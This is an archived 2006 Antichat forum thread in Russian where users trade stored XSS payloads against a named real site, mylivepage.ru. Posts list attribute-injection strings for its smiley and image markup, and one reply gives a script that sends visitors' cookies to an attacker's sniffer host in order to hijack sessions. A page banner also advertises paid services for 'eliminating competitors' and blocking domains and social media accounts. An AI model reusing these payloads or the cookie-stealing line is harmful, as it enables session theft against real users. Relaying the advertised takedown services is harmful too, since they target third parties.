FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
mylivepage.ru активные XSS
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
mylivepage.ru активные XSS
#
1
19.11.2006, 22:08
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами:
10267526
Репутация:
40
mylivepage.ru активные XSS
mylivepage.ru/
активные XSS в форуме, комментариях, личных сообщениях и везде где можно
оставить своё сообщение.
Нет фильтрации `"` применив дополнительные динамические
параметры тэга img експлуатируем XSS:
[[Smile:"dynsrc="javascript
:alert()]]
[[Smile:"lowsrc="javascript
:alert()]]
[[Smile:"style="javascript
:alert()]]
[[Image:"lowsrc="javascript
:alert()]]
[[Image:"style="javascript
:alert()]]
[[Image:"dynsrc="javascript
:alert()]]
[[http://qwe.ru"style="background:url(javascript
:alert())]]
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
__XT__
Посмотреть профиль
Репутация
Отправить личное сообщение для __XT__
Найти все сообщения от __XT__
Добавить в друзья
#
2
19.11.2006, 22:11
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами:
10267526
Репутация:
40
ггг совсем забыл про ещё один параметр onerror=
помойму=)))
короче пипец=
мне кажеться хсс самое малое чт отам есть....наверняка там пхп инъекций куча!
и скуль тоже.
__XT__
Посмотреть профиль
Репутация
Отправить личное сообщение для __XT__
Найти все сообщения от __XT__
Добавить в друзья
#
3
13.12.2006, 16:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
там ещё в Опросе есть ....
в вариантах ответа пишем..
Код:
<script>img = new Image(); img.src = "http://site.ru/ваш СниФ.jpg?"+document.cookie;</script>
и куки у нас....
DimOnOID
Посмотреть профиль
Репутация
Отправить личное сообщение для DimOnOID
Найти все сообщения от DimOnOID
Добавить в друзья
#
4
23.12.2006, 14:31
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
С нами:
10210061
Репутация:
31
Да этот mylivepage.ru даже id сессии не сохраняет и код авторизации всегда один и тот же можно использовать - можно зафлудить по самое не могу.
Правда, слово "<script>" фильтруется полным удалием. Даже <scr<script>ipt> не помогает. Так что че-то затруднился с угоном печенья
Последний раз редактировалось Retscan; 23.12.2006 в
14:52
..
Retscan
Посмотреть профиль
Репутация
Отправить личное сообщение для Retscan
Найти все сообщения от Retscan
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Энциклопедия уязвимых скриптов
DIAgen
Веб-уязвимости
519
23.09.2021
11:44
Xss для новичков
Micr0b
Уязвимости
79
06.07.2018
22:05
XSS worms
Xex
Статьи
0
02.10.2006
01:49
Активные XSS на www.vip.mp3spy.ru
_kREveDKo_
Уязвимости
0
16.06.2006
22:31
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.